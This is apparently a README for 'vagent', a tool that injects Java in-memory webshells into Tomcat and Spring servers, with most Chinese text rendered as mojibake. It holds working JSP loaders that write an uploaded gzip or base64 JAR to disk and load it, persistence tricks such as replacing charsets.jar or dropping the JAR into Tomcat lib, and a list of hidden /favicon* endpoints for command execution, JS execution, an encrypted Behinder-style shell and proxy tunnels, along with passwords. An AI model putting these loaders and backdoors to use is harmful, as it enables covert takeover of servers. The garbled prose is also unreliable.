vagent
vagent copied to clipboard
veo
多功能 java agent 内存马
vagent鍐呭瓨椹敞鍏ュ伐鍏?/h1>
浣跨敤璇存槑锛?/h3>
vagent鏈夊洓绉嶄娇鐢ㄦ柟寮?/p>
1.鍛戒护琛屾柟寮忓姞杞?/h4>
java -jar vagent.jar
浼氳嚜鍔ㄦ敞鍏ュ唴瀛橀┈鍒版墍鏈塲ava璧风殑鏈嶅姟鍐?/p>
2.Tomcat lib 鍚庨棬鍔犺浇
灏?vagent.jar 鏀惧湪 Tomcat 鐩綍涓嬬殑lib鐩綍灏卞彲浠ヤ簡锛屽悕瀛楀彲浠ラ殢鎰忔洿鏀癸紝Tomcat閲嶅惎鍚庝細鑷姩娉ㄥ叆鍐呭瓨椹?/p>
3.jdk/jre Spring鍚庨棬鍔犺浇
灏?vagent.jar 鏇村悕涓?charsets.jar 鏀捐嚦 JAVA_HOME/jre/lib/ 鐩綍涓嬶紝鏇挎崲鍘熸湁鐨刢harsets.jar鏂囦欢锛孲pring閲嶅惎鏃朵細鑷姩娉ㄥ叆鍐呭瓨椹?/p>
鏍规嵁涓氬姟鎯呭喌锛屾湁姒傜巼鏃犻渶閲嶅惎锛屽彂閫佷笅闈㈢殑鍖呭氨鍙互娉ㄥ叆鍐呭瓨椹?/p>
GET / HTTP/1.1
Accept: text/html;charset=GBK
4. JSP/java浠g爜/鍛戒护鍐欏叆鏂囦欢 鍔犺浇
1.JAVA浠g爜鏂瑰紡
闇€瑕佸厛涓婁紶vagent.jar鍒扮洰鏍囨湇鍔″櫒涓?/p>
鍐嶈繍琛屼笅闈㈢殑浠g爜娉ㄥ叆鍐呭瓨椹?/p>
java.net.URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(FilePath).toURI().toURL()});
cl.loadClass("org.apache.catalina.servlets.Attach").getMethod("att", String.class).invoke(null,"ignored");
2.JSP鏂瑰紡
<%
try {
String f = System.getProperty("java.io.tmpdir") + "/" + Math.random();
java.io.InputStream g = new java.util.zip.GZIPInputStream(request.getInputStream());
java.io.FileOutputStream o = new java.io.FileOutputStream(f);
byte[] t = new byte[1024];int n;while((n = g.read(t)) != -1) {o.write(t, 0, n);}g.close();o.close();
java.net.URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(f).toURI().toURL()});
cl.loadClass("org.apache.catalina.servlets.Attach").getMethod("att", String.class).invoke(null,"ignored");
} catch (Exception e) {
out.println(e.getMessage());
}
%>
鐒跺悗鐢╬ostman 鍙戦€乬zip鍘嬬缉鍚庝袱娆★紝娉ㄦ剰鏄袱娆★紝鐨?vagent.jar 澶ч┈鏂囦欢锛堢敤burp鐨刾aste from file 浼氬嚭闂锛?/p>
base64鏂瑰紡
<%
try {
String f = System.getProperty("java.io.tmpdir") + "/" + Math.random();
String b = request.getParameter("c");
Class base64;
byte[] value = null;
try {
base64 =Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { b });
}catch (Exception e){
base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance();
value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { b });
e.printStackTrace();
}
java.io.InputStream d = new java.io.ByteArrayInputStream(value);
java.io.InputStream g = new java.util.zip.GZIPInputStream(d);
java.io.FileOutputStream o = new java.io.FileOutputStream(f);
byte[] t = new byte[1024];int n;while((n = g.read(t)) != -1) {o.write(t, 0, n);}g.close();o.close();
java.net.URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL("file:///"+f)}, getClass().getClassLoader());
cl.loadClass("org.apache.catalina.servlets.Attach").getMethod("att", String.class).invoke(null,"ignored");
}catch (Exception e){
e.printStackTrace();
}
%>
//gzip 鍘嬬缉涓ゆ锛?
cp vagent.jar x
gzip x
mv x.gz x
gzip x
3.鍒╃敤鍛戒护鍐欐枃浠讹紝浣跨敤vagent-mini鍏堟敞鍏ュ皬椹細
鍦ㄩ亣鍒板彧鏈夊懡浠ゆ墽琛屾潵鍐欏叆鏂囦欢鐨勬儏鍐碉紝鍙互鍏堝啓鍏ヤ竴涓獀agent-mini.jar灏忛┈
鐒跺悗杩愯 java -jar vagent-mini.jar 娉ㄥ叆灏忛┈
vagent-mini灏忛┈渚濊禆浜巎dk鐜锛屽鏋滅洰鏍囧彧鏈塲re鐜鍙兘浼氭敞鍏ュけ璐ワ紝vagent澶ч┈鍒檍re鍜宩dk鐜閮介€氱敤
閾炬帴锛氫互/faviconmini 缁撳熬
//gzip 鍘嬬缉涓ゆ锛?
cp vagent.jar x
gzip x
mv x.gz x
gzip x
鐒跺悗鐢╬ostman 鍙戦€乬zip鍘嬬缉涓ゆ锛屾敞鎰忔槸涓ゆ锛屽悗鐨?vagent.jar 澶ч┈鏂囦欢鍒伴摼鎺ヨ矾寰勬敞鍏ュぇ椹紙鐢╞urp鐨刾aste from file 浼氬嚭闂锛?/p>
娉ㄥ叆鐨勫唴瀛橀┈锛?/h3>
1.鍐拌潕
閾炬帴锛氫互 /faviconb 缁撳熬
瀵嗙爜锛氳嚜瀹氫箟鍔犺В瀵嗗崗璁?/p>
private byte[] Encrypt(byte[] data) {
byte[] dt = new byte[data.length];
for (int i = 0; i < data.length; i++) {
dt[i] = (byte) (data[i] + 1);
}
try {
java.io.ByteArrayOutputStream o = new java.io.ByteArrayOutputStream();
java.util.zip.GZIPOutputStream g = new java.util.zip.GZIPOutputStream(o);
g.write(dt);
g.close();
byte[] c = o.toByteArray();
byte[] ct = new byte[c.length];
for (int i = 0; i < c.length; i++) {
ct[i] = (byte) (c[i] + 1);
}
return ct;
} catch (Exception ignored) {
}
return data;
}
private byte[] Decrypt(byte[] data) {
byte[] dt = new byte[data.length];
for (int i = 0; i < data.length; i++) {
dt[i] = (byte) (data[i] - 1);
}
try {
java.io.ByteArrayInputStream t = new java.io.ByteArrayInputStream(dt);
java.util.zip.GZIPInputStream i = new java.util.zip.GZIPInputStream(t, dt.length);
byte[] c = r(i);
byte[] ct = new byte[c.length];
for (int b = 0; b < c.length; b++) {
ct[b] = (byte) (c[b] - 1);
}
return ct;
} catch (Exception ignored) {
}
return data;
}
private byte[] r(java.io.InputStream i) {
byte[] temp = new byte[1024];
java.io.ByteArrayOutputStream b = new java.io.ByteArrayOutputStream();
int n;
try {
while((n = i.read(temp)) != -1) {b.write(temp, 0, n);
}} catch (Exception ignored) {
}
return b.toByteArray();
}
2.CMD椹?/h4>
閾炬帴锛氫互 /faviconc 缁撳熬
POST涓ゆBase64浠ュ悗鐨勫懡浠?/p>
3.JS浠g爜鎵ц椹?/h4>
閾炬帴锛氫互 /faviconjs 缁撳熬
POST涓ゆBase64浠ュ悗鐨刯s浠g爜
涔熷彲浠ヤ娇鐢ㄨ殎鍓戣繛鎺ワ紝瀵嗙爜鏄痑
4.Neo浠g悊鍐呭瓨椹?/h4>
閾炬帴锛氫互 /faviconneo 缁撳熬
瀵嗙爜锛歱age锛岃鍔?-skip
python3 neoreg.py -k page -u URL -p 1083 --skip
5.Suo5浠g悊鍐呭瓨椹?/h4>
閾炬帴锛氫互 /faviconsuo 缁撳熬
鏃犻渶瀵嗙爜
6.WebSocket浠g悊鍐呭瓨椹?/h4>
閾炬帴锛氫互 /faviconws 缁撳熬
鏃犻渶瀵嗙爜锛屼娇鐢╣ost杩涜杩炴帴
veo